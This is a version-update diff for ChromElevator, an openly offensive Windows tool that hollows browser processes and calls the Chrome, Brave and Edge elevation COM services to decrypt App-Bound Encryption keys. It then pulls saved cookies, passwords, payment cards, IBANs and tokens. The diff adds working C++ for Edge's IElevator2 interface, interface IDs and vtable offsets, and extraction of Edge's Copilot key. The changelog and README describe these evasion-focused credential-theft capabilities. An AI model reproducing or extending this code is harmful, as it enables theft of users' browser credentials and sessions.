v0.18.1

Author: xaitax

CHANGELOG.md

@@ -2,15 +2,31 @@
 
 ## 🆕 Changelog
 
+### v0.18.1
+
+* **Edge Copilot/Aster Key Extraction**: Added extraction and display of Edge's secondary App-Bound Encryption key (`aster_app_bound_encrypted_key`).
+  * This key is used by Edge for encrypting imported passwords and Copilot-related data when server-side feature flags are enabled.
+  * Extracted via `IElevator` interface and displayed as `ASTER_KEY:` in IPC output alongside the primary key.
+
+* **Brave IElevator2 Support**: Brave now uses Chrome's `IElevator2Chrome` interface for forward compatibility.
+  * Brave's elevation service exposes Chrome's `IElevator2Chrome` IID: `{1BF5208B-295F-4992-B5F4-3A9BB6494838}`
+  * Same vtable layout as Chrome (DecryptData at offset 40).
+
+* **Edge IElevator2 Support**: Added Microsoft Edge's `IElevator2` interface for forward compatibility (Edge 144+).
+  * New IID: `{8F7B6792-784D-4047-845D-1782EFBEF205}`
+  * Edge now follows the same IElevator2 → IElevator fallback pattern as Chrome/Brave.
+  * Note: Edge's interface chain differs (includes `IElevatorEdgeBase`), with DecryptData at offset 64 vs 40 for Chrome/Brave.
+
+* **Unicode Console Output**: Enhanced console formatting with UTF-8 box-drawing characters for cleaner visual hierarchy.
+
 ### v0.18.0
 
 * **IElevator2 Interface Support**: Added forward-compatible support for Chrome's new `IElevator2` COM interface ([chromium/chromium@4962049](https://github.com/chromium/chromium/commit/49620496b8f0b7c0c63e2666a82e01180df3f4c3)).
   * Chrome 144+ introduces `IElevator2` as a replacement for the legacy `IElevator` interface used in App-Bound Encryption.
   * ChromElevator now attempts `IElevator2` first (when available), with automatic fallback to `IElevator` for older Chrome versions.
   * This ensures continued operation across Chrome 143 (legacy), Chrome 144+ (transition period), and future versions (when `IElevator` is removed).
   * New Chrome IElevator2 IID: `{1BF5208B-295F-4992-B5F4-3A9BB6494838}`
-  * Brave Browser support is prepared with placeholder for their upcoming `IElevator2` adoption.
-  * Edge remains unchanged (uses different interface chain).
+  * Brave Browser reuses Chrome's `IElevator2Chrome` IID for compatibility.
 
 * **Chrome Beta Channel Support**: Added Chrome Beta as a separate browser target.
   * Use `--target chrome-beta` or include in `all` scan.

README.md

@@ -63,12 +63,12 @@ This tool's effectiveness is rooted in a combination of modern, evasion-focused
 
 | Browser                 | Tested Version (x64 & ARM64) |
 | ----------------------- | ---------------------------- |
-| **Google Chrome**       | 143.0.7499.193               |
-| **Google Chrome Beta**  | 144.0.7559.59                |
-| **Brave**               | 1.85.120 (143.0.7499.192)    |
-| **Microsoft Edge**      | 144.0.3719.67                |
+| **Google Chrome**       | 144.0.7559.97                |
+| **Google Chrome Beta**  | 145.0.7632.18                |
+| **Brave**               | 1.86.142 (144.0.7559.97)     |
+| **Microsoft Edge**      | 144.0.3719.92                |
 
-> **Note:** Chrome 144 introduces the new `IElevator2` COM interface. This tool automatically uses `IElevator2` when available and falls back to `IElevator` for Chrome 143 and earlier.
+> **Note:** Chrome/Brave/Edge 144+ use the new `IElevator2` COM interface. This tool automatically uses `IElevator2` when available and falls back to `IElevator` for older versions.
 
 ## 🔍 Feature Support Matrix
 
@@ -152,7 +152,7 @@ _________ .__                         ___________.__                       __
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.18.0 by @xaitax
+ x64 & ARM64 | v0.18.1 by @xaitax
 
   Usage: chromelevator.exe [options] <chrome|chrome-beta|edge|brave|all>
 
@@ -195,7 +195,7 @@ _________ .__                         ___________.__                       __
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.18.0 by @xaitax
+ x64 & ARM64 | v0.18.1 by @xaitax
 
   ┌──── Brave (143.1.85.120) ──────────────────────
   │
@@ -270,7 +270,7 @@ _________ .__                         ___________.__                       __
  \______  /___|  /__|   \____/|__|_|  /_______  /|____/\___  >\_/  (____  /__|  \____/|__|
         \/     \/                   \/        \/           \/           \/
  Direct Syscall-Based Reflective Hollowing
- x64 & ARM64 | v0.18.0 by @xaitax
+ x64 & ARM64 | v0.18.1 by @xaitax
 
   ┌──── Chrome (143.0.7499.193) ───────────────────
   │ Creating suspended process: C:\Program Files\Google\Chrome\Application\chrome.exe

src/com/elevator.cpp

@@ -45,14 +45,29 @@ namespace Com
 
         if (isEdge)
         {
-            // Edge uses a different interface chain - no v2 support needed
-            Microsoft::WRL::ComPtr<IEdgeElevatorFinal> elevator;
-            hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, iid, &elevator);
-            if (SUCCEEDED(hr))
+            // Edge uses a different interface chain with IElevatorEdgeBase
+            if (iid_v2.has_value())
             {
-                CoSetProxyBlanket(elevator.Get(), RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, COLE_DEFAULT_PRINCIPAL,
-                                  RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_DYNAMIC_CLOAKING);
-                hr = elevator->DecryptData(bstrEnc, &bstrPlain, &comErr);
+                Microsoft::WRL::ComPtr<IEdgeElevator2Final> elevator2;
+                hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, iid_v2.value(), &elevator2);
+                if (SUCCEEDED(hr))
+                {
+                    CoSetProxyBlanket(elevator2.Get(), RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, COLE_DEFAULT_PRINCIPAL,
+                                      RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_DYNAMIC_CLOAKING);
+                    hr = elevator2->DecryptData(bstrEnc, &bstrPlain, &comErr);
+                }
+            }
+
+            if (!iid_v2.has_value() || hr == E_NOINTERFACE || FAILED(hr))
+            {
+                Microsoft::WRL::ComPtr<IEdgeElevatorFinal> elevator;
+                hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, iid, &elevator);
+                if (SUCCEEDED(hr))
+                {
+                    CoSetProxyBlanket(elevator.Get(), RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, COLE_DEFAULT_PRINCIPAL,
+                                      RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_DYNAMIC_CLOAKING);
+                    hr = elevator->DecryptData(bstrEnc, &bstrPlain, &comErr);
+                }
             }
         }
         else
@@ -97,4 +112,52 @@ namespace Com
         return result;
     }
 
+    std::vector<uint8_t> Elevator::DecryptKeyEdgeIID(
+        const std::vector<uint8_t> &encryptedKey,
+        const CLSID &clsid,
+        const IID &iid)
+    {
+        BSTR bstrEnc = SysAllocStringByteLen(reinterpret_cast<const char *>(encryptedKey.data()), (UINT)encryptedKey.size());
+        if (!bstrEnc)
+            throw std::runtime_error("SysAllocStringByteLen failed");
+
+        struct BstrDeleter
+        {
+            void operator()(BSTR b) { SysFreeString(b); }
+        };
+        std::unique_ptr<OLECHAR[], BstrDeleter> encGuard(bstrEnc);
+
+        BSTR bstrPlain = nullptr;
+        DWORD comErr = 0;
+        HRESULT hr = E_FAIL;
+
+        // Use Edge interface chain with specified IID
+        Microsoft::WRL::ComPtr<IEdgeElevatorFinal> elevator;
+        hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, iid, &elevator);
+
+        if (SUCCEEDED(hr))
+        {
+            CoSetProxyBlanket(elevator.Get(), RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, COLE_DEFAULT_PRINCIPAL,
+                              RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_IMP_LEVEL_IMPERSONATE, nullptr, EOAC_DYNAMIC_CLOAKING);
+            hr = elevator->DecryptData(bstrEnc, &bstrPlain, &comErr);
+        }
+
+        if (FAILED(hr))
+        {
+            std::ostringstream oss;
+            oss << "DecryptData failed: 0x" << std::hex << hr << " (COM err: " << std::dec << comErr << ")";
+            throw std::runtime_error(oss.str());
+        }
+
+        if (!bstrPlain)
+            throw std::runtime_error("Decrypted key is null");
+
+        std::unique_ptr<OLECHAR[], BstrDeleter> plainGuard(bstrPlain);
+        UINT len = SysStringByteLen(bstrPlain);
+
+        std::vector<uint8_t> result(len);
+        memcpy(result.data(), bstrPlain, len);
+        return result;
+    }
+
 }

src/com/elevator.hpp

@@ -46,6 +46,17 @@ namespace Com {
     MIDL_INTERFACE("C9C2B807-7731-4F34-81B7-44FF7779522B")
     IEdgeElevatorFinal : public IEdgeIntermediateElevator{};
 
+    MIDL_INTERFACE("8F7B6792-784D-4047-845D-1782EFBEF205")
+    IEdgeElevator2Final : public IEdgeIntermediateElevator {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE RunIsolatedChrome(const WCHAR*, const WCHAR*, DWORD*, ULONG_PTR*) = 0;
+        virtual HRESULT STDMETHODCALLTYPE AcceptInvitation(const WCHAR*) = 0;
+    };
+
+    // Copilot-specific interface (same methods, different IID for path validation)
+    MIDL_INTERFACE("17DF149F-BE61-447E-A305-522F55021B36")
+    IEdgeCopilotElevator : public IEdgeIntermediateElevator{};
+
     class Elevator {
     public:
         Elevator();
@@ -58,6 +69,12 @@ namespace Com {
             const std::optional<IID>& iid_v2,
             bool isEdge);
 
+        // Decrypt using specific Edge IID (for testing Copilot vs Edge)
+        std::vector<uint8_t> DecryptKeyEdgeIID(
+            const std::vector<uint8_t>& encryptedKey,
+            const CLSID& clsid,
+            const IID& iid);
+
     private:
         bool m_initialized;
     };

src/core/console.hpp

@@ -19,6 +19,7 @@ namespace Core {
             CONSOLE_SCREEN_BUFFER_INFO csbi;
             GetConsoleScreenBufferInfo(m_hConsole, &csbi);
             m_origAttrs = csbi.wAttributes;
+            SetConsoleOutputCP(CP_UTF8);
         }
 
         ~Console() {
@@ -43,7 +44,7 @@ namespace Core {
         void Debug(const std::string& msg) const {
             if (m_verbose) {
                 SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
-                std::cout << "  \xB3 ";
+                std::cout << "  │ ";
                 SetConsoleTextAttribute(m_hConsole, FOREGROUND_BLUE | FOREGROUND_INTENSITY);
                 std::cout << msg << std::endl;
                 SetConsoleTextAttribute(m_hConsole, m_origAttrs);
@@ -54,7 +55,7 @@ namespace Core {
         void BrowserHeader(const std::string& name, const std::string& version = "") const {
             std::cout << std::endl;
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
-            std::cout << "  \xDA\xC4\xC4\xC4\xC4 ";
+            std::cout << "  ┌──── ";
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
             std::cout << name;
 
@@ -73,19 +74,44 @@ namespace Core {
             const size_t totalWidth = 50;
             const size_t prefixLen = 7;  // "  ┌──── "
             size_t dashCount = (totalWidth > prefixLen + contentLen + 1) ? (totalWidth - prefixLen - contentLen - 1) : 4;
-            std::cout << " " << std::string(dashCount, '\xC4') << std::endl;
+            std::cout << " ";
+            for (size_t i = 0; i < dashCount; ++i) std::cout << "─";
+            std::cout << std::endl;
             SetConsoleTextAttribute(m_hConsole, m_origAttrs);
         }
 
-        // AES Key display
+        // No ABE warning (within browser box)
+        void NoAbeWarning(const std::string& msg) const {
+            SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
+            std::cout << "  │ ";
+            SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+            std::cout << msg << std::endl;
+            SetConsoleTextAttribute(m_hConsole, m_origAttrs);
+        }
+
+        // ABE Key display
         void KeyDecrypted(const std::string& keyHex) const {
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
-            std::cout << "  \xB3" << std::endl;
-            std::cout << "  \xB3 ";
+            std::cout << "  │" << std::endl;
+            std::cout << "  │ ";
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
-            std::cout << "Decryption Key" << std::endl;
+            std::cout << "App-Bound Encryption Key" << std::endl;
+            SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
+            std::cout << "  │ ";
+            SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_INTENSITY);
+            std::cout << keyHex << std::endl;
+            SetConsoleTextAttribute(m_hConsole, m_origAttrs);
+        }
+
+        // Copilot ABE Key display (Edge only)
+        void AsterKeyDecrypted(const std::string& keyHex) const {
+            SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
+            std::cout << "  │" << std::endl;
+            std::cout << "  │ ";
+            SetConsoleTextAttribute(m_hConsole, FOREGROUND_BLUE | FOREGROUND_GREEN | FOREGROUND_INTENSITY);
+            std::cout << "Copilot App-Bound Encryption Key" << std::endl;
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
-            std::cout << "  \xB3 ";
+            std::cout << "  │ ";
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_INTENSITY);
             std::cout << keyHex << std::endl;
             SetConsoleTextAttribute(m_hConsole, m_origAttrs);
@@ -94,8 +120,8 @@ namespace Core {
         // Profile section header
         void ProfileHeader(const std::string& name) const {
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
-            std::cout << "  \xB3" << std::endl;
-            std::cout << "  \xC3\xC4\xC4 ";
+            std::cout << "  │" << std::endl;
+            std::cout << "  ├── ";
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_BLUE | FOREGROUND_GREEN | FOREGROUND_INTENSITY);
             std::cout << name << std::endl;
             SetConsoleTextAttribute(m_hConsole, m_origAttrs);
@@ -105,7 +131,7 @@ namespace Core {
         void DataRow(const std::string& key, const std::string& value) const {
             if (m_verbose) {
                 SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
-                std::cout << "  \xB3   ";
+                std::cout << "  │   ";
                 std::cout << std::left << std::setw(12) << key;
                 SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_INTENSITY);
                 std::cout << value << std::endl;
@@ -116,7 +142,7 @@ namespace Core {
         // Extraction result (always shown)
         void ExtractionResult(const std::string& type, int count, int total = -1) const {
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
-            std::cout << "  \xB3   ";
+            std::cout << "  │   ";
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
             std::cout << std::left << std::setw(12) << type;
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE | FOREGROUND_INTENSITY);
@@ -132,8 +158,8 @@ namespace Core {
         // Summary line
         void Summary(int cookies, int passwords, int cards, int ibans, int tokens, int profiles, const std::string& outputPath) const {
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
-            std::cout << "  \xB3" << std::endl;
-            std::cout << "  \xC0\xC4\xC4 ";
+            std::cout << "  │" << std::endl;
+            std::cout << "  └── ";
             SetConsoleTextAttribute(m_hConsole, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
 
             std::vector<std::string> parts;

src/core/version.hpp

@@ -6,9 +6,9 @@
 namespace Core {
 
     // Main version string - shown in banner
-    constexpr const char* VERSION = "0.18.0";
+    constexpr const char* VERSION = "0.18.1";
 
     // Full version for build identification (update for releases)
-    constexpr const char* BUILD_TAG = "v0.18.0";
+    constexpr const char* BUILD_TAG = "v0.18.1";
 
 }

src/injector/injector_main.cpp

@@ -16,6 +16,7 @@ using namespace Injector;
 struct GlobalStats {
     int successful = 0;
     int failed = 0;
+    int skipped = 0;
 };
 
 void ProcessBrowser(const BrowserInfo& browser, bool verbose, bool fingerprint, bool killFirst,
@@ -66,7 +67,10 @@ void ProcessBrowser(const BrowserInfo& browser, bool verbose, bool fingerprint,
         pipe.ProcessMessages(verbose);
 
         auto pStats = pipe.GetStats();
-        if (pStats.cookies > 0 || pStats.passwords > 0 || pStats.cards > 0 || pStats.ibans > 0 || pStats.tokens > 0) {
+        if (pStats.noAbe) {
+            // ABE not enabled - not a failure, just skip
+            stats.skipped++;
+        } else if (pStats.cookies > 0 || pStats.passwords > 0 || pStats.cards > 0 || pStats.ibans > 0 || pStats.tokens > 0) {
             console.Summary(pStats.cookies, pStats.passwords, pStats.cards, pStats.ibans, pStats.tokens,
                            pStats.profiles, (output / browser.displayName).string());
             stats.successful++;

src/injector/pipe_server.cpp

@@ -98,6 +98,13 @@ namespace Injector {
                 else if (msg.rfind("KEY:", 0) == 0) {
                     console.KeyDecrypted(msg.substr(4));
                 }
+                else if (msg.rfind("NO_ABE:", 0) == 0) {
+                    console.NoAbeWarning(msg.substr(7));
+                    m_stats.noAbe = true;
+                }
+                else if (msg.rfind("ASTER_KEY:", 0) == 0) {
+                    console.AsterKeyDecrypted(msg.substr(10));
+                }
                 else if (msg.rfind("COOKIES:", 0) == 0) {
                     size_t sep = msg.find(':', 8);
                     if (sep != std::string::npos) {

src/injector/pipe_server.hpp

@@ -18,6 +18,7 @@ namespace Injector {
         int ibans = 0;
         int tokens = 0;
         int profiles = 0;
+        bool noAbe = false;
     };
 
     class PipeServer {